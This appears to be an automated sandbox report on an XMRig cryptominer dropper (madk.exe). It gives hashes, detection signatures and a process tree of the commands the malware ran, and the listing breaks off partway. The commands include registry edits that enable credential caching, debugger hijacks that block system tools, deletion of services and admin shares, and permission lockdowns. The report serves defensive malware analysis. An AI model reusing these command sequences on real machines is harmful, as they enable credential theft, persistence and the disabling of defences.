xmrig | 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594

Analysis

max time kernel
151s
max time network
129s
platform
windows7_x64
resource
win7-20220414-en
submitted
22-05-2022 05:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

madk.exe
Size

3.4MB
MD5

d00af5991807952929e5b986afd295c9
SHA1

7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256

025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512

c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6

Score

10^/10

xmrig discovery evasion miner persistence ransomware upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
\Windows\Fonts\rundlls.exe	xmrig
C:\Windows\Fonts\rundlls.exe	xmrig

Executes dropped EXE 13 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exe

pid	process
2016	svchost.exe
1976	svchost.exe
1040	svchost.exe
364	svchost.exe
1356	svchost.exe
1628	svchost.exe
1236	conhost.exe
2000	svchost.exe
268	svchost.exe
1168	svchost.exe
2016	svchost.exe
1416	svchost.exe
1952	rundlls.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\conhost.exe	upx
C:\Windows\Fonts\conhost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx

Deletes itself 1 IoCs

Processes:

WScript.exe

pid process

1668 WScript.exe
Loads dropped DLL 6 IoCs

Processes:

madk.exesvchost.exe

pid process

916 madk.exe
836
1424
1372
1228
1416 svchost.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

pid process

2012 takeown.exe
1384 takeown.exe
1444 takeown.exe
1724 takeown.exe

pid	process
1668	WScript.exe

pid	process
916	madk.exe
836
1424
1372
1228
1416	svchost.exe

pid	process
2012	takeown.exe
1384	takeown.exe
1444	takeown.exe
1724	takeown.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\conhost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\conhost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts\csrss.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\lsass.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with WMI 4 IoCs
evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

268 WMIC.exe
948 WMIC.exe
1744 WMIC.exe
1736 WMIC.exe

pid	process
268	WMIC.exe
948	WMIC.exe
1744	WMIC.exe
1736	WMIC.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1560	taskkill.exe
904	taskkill.exe
1396	taskkill.exe
844	taskkill.exe
1232	taskkill.exe
1568	taskkill.exe
1560	taskkill.exe
1924	taskkill.exe
596	taskkill.exe
1568	taskkill.exe
564	taskkill.exe
836	taskkill.exe
1956	taskkill.exe
1816	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1616 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

972 PING.EXE

pid	process
1616	reg.exe

pid	process
972	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exe

pid	process
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe
1236	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	596	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeLockMemoryPrivilege	1952	rundlls.exe
Token: SeIncreaseQuotaPrivilege	1736	WMIC.exe
Token: SeSecurityPrivilege	1736	WMIC.exe
Token: SeTakeOwnershipPrivilege	1736	WMIC.exe
Token: SeLoadDriverPrivilege	1736	WMIC.exe
Token: SeSystemProfilePrivilege	1736	WMIC.exe
Token: SeSystemtimePrivilege	1736	WMIC.exe
Token: SeProfSingleProcessPrivilege	1736	WMIC.exe
Token: SeIncBasePriorityPrivilege	1736	WMIC.exe
Token: SeCreatePagefilePrivilege	1736	WMIC.exe
Token: SeBackupPrivilege	1736	WMIC.exe
Token: SeRestorePrivilege	1736	WMIC.exe
Token: SeShutdownPrivilege	1736	WMIC.exe
Token: SeDebugPrivilege	1736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1736	WMIC.exe
Token: SeRemoteShutdownPrivilege	1736	WMIC.exe
Token: SeUndockPrivilege	1736	WMIC.exe
Token: SeManageVolumePrivilege	1736	WMIC.exe
Token: 33	1736	WMIC.exe
Token: 34	1736	WMIC.exe
Token: 35	1736	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1736	WMIC.exe
Token: SeSecurityPrivilege	1736	WMIC.exe
Token: SeTakeOwnershipPrivilege	1736	WMIC.exe
Token: SeLoadDriverPrivilege	1736	WMIC.exe
Token: SeSystemProfilePrivilege	1736	WMIC.exe
Token: SeSystemtimePrivilege	1736	WMIC.exe
Token: SeProfSingleProcessPrivilege	1736	WMIC.exe
Token: SeIncBasePriorityPrivilege	1736	WMIC.exe
Token: SeCreatePagefilePrivilege	1736	WMIC.exe
Token: SeBackupPrivilege	1736	WMIC.exe
Token: SeRestorePrivilege	1736	WMIC.exe
Token: SeShutdownPrivilege	1736	WMIC.exe
Token: SeDebugPrivilege	1736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1736	WMIC.exe
Token: SeRemoteShutdownPrivilege	1736	WMIC.exe
Token: SeUndockPrivilege	1736	WMIC.exe
Token: SeManageVolumePrivilege	1736	WMIC.exe
Token: 33	1736	WMIC.exe
Token: 34	1736	WMIC.exe
Token: 35	1736	WMIC.exe
Token: SeIncreaseQuotaPrivilege	268	WMIC.exe
Token: SeSecurityPrivilege	268	WMIC.exe
Token: SeTakeOwnershipPrivilege	268	WMIC.exe
Token: SeLoadDriverPrivilege	268	WMIC.exe
Token: SeSystemProfilePrivilege	268	WMIC.exe
Token: SeSystemtimePrivilege	268	WMIC.exe
Token: SeProfSingleProcessPrivilege	268	WMIC.exe
Token: SeIncBasePriorityPrivilege	268	WMIC.exe
Token: SeCreatePagefilePrivilege	268	WMIC.exe
Token: SeBackupPrivilege	268	WMIC.exe
Token: SeRestorePrivilege	268	WMIC.exe
Token: SeShutdownPrivilege	268	WMIC.exe
Token: SeDebugPrivilege	268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	268	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundlls.exe

pid process

1952 rundlls.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

madk.execonhost.exe

pid process

916 madk.exe
916 madk.exe
1236 conhost.exe
1236 conhost.exe

pid	process
1952	rundlls.exe

pid	process
916	madk.exe
916	madk.exe
1236	conhost.exe
1236	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

madk.execmd.exe

description	pid	process	target process
PID 916 wrote to memory of 1720	916	madk.exe	cmd.exe
PID 916 wrote to memory of 1720	916	madk.exe	cmd.exe
PID 916 wrote to memory of 1720	916	madk.exe	cmd.exe
PID 916 wrote to memory of 1720	916	madk.exe	cmd.exe
PID 916 wrote to memory of 1616	916	madk.exe	reg.exe
PID 916 wrote to memory of 1616	916	madk.exe	reg.exe
PID 916 wrote to memory of 1616	916	madk.exe	reg.exe
PID 916 wrote to memory of 1616	916	madk.exe	reg.exe
PID 916 wrote to memory of 1680	916	madk.exe	reg.exe
PID 916 wrote to memory of 1680	916	madk.exe	reg.exe
PID 916 wrote to memory of 1680	916	madk.exe	reg.exe
PID 916 wrote to memory of 1680	916	madk.exe	reg.exe
PID 1720 wrote to memory of 2032	1720	cmd.exe	attrib.exe
PID 1720 wrote to memory of 2032	1720	cmd.exe	attrib.exe
PID 1720 wrote to memory of 2032	1720	cmd.exe	attrib.exe
PID 1720 wrote to memory of 2032	1720	cmd.exe	attrib.exe
PID 916 wrote to memory of 1228	916	madk.exe	reg.exe
PID 916 wrote to memory of 1228	916	madk.exe	reg.exe
PID 916 wrote to memory of 1228	916	madk.exe	reg.exe
PID 916 wrote to memory of 1228	916	madk.exe	reg.exe
PID 916 wrote to memory of 2008	916	madk.exe	reg.exe
PID 916 wrote to memory of 2008	916	madk.exe	reg.exe
PID 916 wrote to memory of 2008	916	madk.exe	reg.exe
PID 916 wrote to memory of 2008	916	madk.exe	reg.exe
PID 916 wrote to memory of 1964	916	madk.exe	reg.exe
PID 916 wrote to memory of 1964	916	madk.exe	reg.exe
PID 916 wrote to memory of 1964	916	madk.exe	reg.exe
PID 916 wrote to memory of 1964	916	madk.exe	reg.exe
PID 916 wrote to memory of 788	916	madk.exe	sc.exe
PID 916 wrote to memory of 788	916	madk.exe	sc.exe
PID 916 wrote to memory of 788	916	madk.exe	sc.exe
PID 916 wrote to memory of 788	916	madk.exe	sc.exe
PID 916 wrote to memory of 876	916	madk.exe	sc.exe
PID 916 wrote to memory of 876	916	madk.exe	sc.exe
PID 916 wrote to memory of 876	916	madk.exe	sc.exe
PID 916 wrote to memory of 876	916	madk.exe	sc.exe
PID 916 wrote to memory of 1204	916	madk.exe	sc.exe
PID 916 wrote to memory of 1204	916	madk.exe	sc.exe
PID 916 wrote to memory of 1204	916	madk.exe	sc.exe
PID 916 wrote to memory of 1204	916	madk.exe	sc.exe
PID 916 wrote to memory of 1332	916	madk.exe	sc.exe
PID 916 wrote to memory of 1332	916	madk.exe	sc.exe
PID 916 wrote to memory of 1332	916	madk.exe	sc.exe
PID 916 wrote to memory of 1332	916	madk.exe	sc.exe
PID 916 wrote to memory of 1352	916	madk.exe	sc.exe
PID 916 wrote to memory of 1352	916	madk.exe	sc.exe
PID 916 wrote to memory of 1352	916	madk.exe	sc.exe
PID 916 wrote to memory of 1352	916	madk.exe	sc.exe
PID 916 wrote to memory of 1936	916	madk.exe	sc.exe
PID 916 wrote to memory of 1936	916	madk.exe	sc.exe
PID 916 wrote to memory of 1936	916	madk.exe	sc.exe
PID 916 wrote to memory of 1936	916	madk.exe	sc.exe
PID 916 wrote to memory of 976	916	madk.exe	sc.exe
PID 916 wrote to memory of 976	916	madk.exe	sc.exe
PID 916 wrote to memory of 976	916	madk.exe	sc.exe
PID 916 wrote to memory of 976	916	madk.exe	sc.exe
PID 916 wrote to memory of 1888	916	madk.exe	sc.exe
PID 916 wrote to memory of 1888	916	madk.exe	sc.exe
PID 916 wrote to memory of 1888	916	madk.exe	sc.exe
PID 916 wrote to memory of 1888	916	madk.exe	sc.exe
PID 916 wrote to memory of 1560	916	madk.exe	taskkill.exe
PID 916 wrote to memory of 1560	916	madk.exe	taskkill.exe
PID 916 wrote to memory of 1560	916	madk.exe	taskkill.exe
PID 916 wrote to memory of 1560	916	madk.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
1380	attrib.exe
1204	attrib.exe
916	attrib.exe
268	attrib.exe
832	attrib.exe
1340	attrib.exe
1084	attrib.exe
2028	attrib.exe
904	attrib.exe
1648	attrib.exe
2028	attrib.exe
948	attrib.exe
1668	attrib.exe
1284	attrib.exe
576	attrib.exe
1496	attrib.exe
832	attrib.exe
1516	attrib.exe
780	attrib.exe
2036	attrib.exe
2044	attrib.exe
1552	attrib.exe
836	attrib.exe
2036	attrib.exe
1104	attrib.exe
1568	attrib.exe
296	attrib.exe
1548	attrib.exe
1228	attrib.exe
336	attrib.exe
2000	attrib.exe
1956	attrib.exe
1872	attrib.exe
960	attrib.exe
336	attrib.exe
1468	attrib.exe
1256	attrib.exe
1828	attrib.exe
576	attrib.exe
972	attrib.exe
1344	attrib.exe
784	attrib.exe
1372	attrib.exe
1948	attrib.exe
1080	attrib.exe
2028	attrib.exe
584	attrib.exe
1736	attrib.exe
1816	attrib.exe
1280	attrib.exe
296	attrib.exe
936	attrib.exe
1616	attrib.exe
1872	attrib.exe
1780	attrib.exe
1424	attrib.exe
1380	attrib.exe
1488	attrib.exe
1676	attrib.exe
1584	attrib.exe
296	attrib.exe
1344	attrib.exe
1168	attrib.exe
836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\madk.exe
"C:\Users\Admin\AppData\Local\Temp\madk.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:1616

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
PID:1680

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
PID:1228

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2⤵
PID:2008

C:\Windows\SysWOW64\sc.exe
sc stop MetPipAtcivator
2⤵
PID:788

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2⤵
PID:1964

C:\Windows\SysWOW64\sc.exe
sc delete MetPipAtcivator
2⤵
PID:876

C:\Windows\SysWOW64\sc.exe
sc stop SetPipAtcivator
2⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
sc delete SetPipAtcivator
2⤵
PID:1332

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMaims
2⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMaims
2⤵
PID:1936

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMais
2⤵
PID:976

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMais
2⤵
PID:1888

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dl1hots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im d1lhots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundlls.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SysWOW64\net1.exe
net1 user mm123$ /del
2⤵
PID:1732

C:\Windows\SysWOW64\net.exe
net user mm123$ /del
2⤵
PID:1416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user mm123$ /del
3⤵
PID:704

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:1916

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
PID:956

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:2036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:1660

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
PID:2032

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
2⤵
- Executes dropped EXE
PID:2016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:1040

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2⤵
- Executes dropped EXE
PID:1976

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:364

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\TEMP\csonhost.bat
2⤵
PID:1768

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
3⤵
PID:2000

C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 5
3⤵
- Runs ping.exe
PID:972

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
PID:1140

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net share iPC$ /delete
3⤵
PID:596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share iPC$ /delete
4⤵
PID:1640

C:\Windows\SysWOW64\net.exe
net share admin$ /delete
3⤵
PID:936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share admin$ /delete
4⤵
PID:680

C:\Windows\SysWOW64\net.exe
net share c$ /delete
3⤵
PID:1444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share c$ /delete
4⤵
PID:1924

C:\Windows\SysWOW64\net.exe
net share d$ /delete
3⤵
PID:1972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share d$ /delete
4⤵
PID:844

C:\Windows\SysWOW64\net.exe
net share e$ /delete
3⤵
PID:960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share e$ /delete
4⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net share f$ /delete
3⤵
PID:1592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share f$ /delete
4⤵
PID:1968

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
3⤵
PID:524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
4⤵
PID:576

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED
3⤵
PID:1648

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
PID:432

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
PID:2016

C:\Windows\SysWOW64\sc.exe
sc stop Graphipcs_PerfSvcs
3⤵
PID:1676

C:\Windows\SysWOW64\sc.exe
sc delete Graphipcs_PerfSvcs
3⤵
PID:780

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Views/modifies file attributes
PID:1204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:1700

C:\Windows\SysWOW64\sc.exe
sc stop conhost
3⤵
PID:1256

C:\Windows\SysWOW64\sc.exe
sc delete conhost
3⤵
PID:1492

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\conhost.exe /a
3⤵
- Modifies file permissions
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\conhost.exe /d everyone
3⤵
PID:1052

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:1372

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:692

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:576

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:524

C:\Windows\SysWOW64\reg.exe
